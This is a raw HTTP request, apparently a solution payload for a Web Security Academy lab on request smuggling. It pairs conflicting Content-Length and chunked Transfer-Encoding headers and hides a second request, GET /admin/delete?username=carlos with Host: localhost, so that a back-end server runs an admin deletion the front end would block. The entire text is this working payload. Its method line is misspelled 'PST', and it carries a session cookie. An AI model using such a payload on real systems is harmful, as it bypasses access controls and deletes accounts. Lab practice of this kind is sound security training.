PST / HTTP/1.1
Host: 0ad3009e04c32bd1c075044300c5009a.web-security-academy.net
Cookie: session=Mi64vM9cpmSyAyZzfhr37V6Yc2gDF11s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Origin: https://0ad3009e04c32bd1c075044300c5009a.web-security-academy.net
Referer: https://0ad3009e04c32bd1c075044300c5009a.web-security-academy.net/post?postId=9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x= 
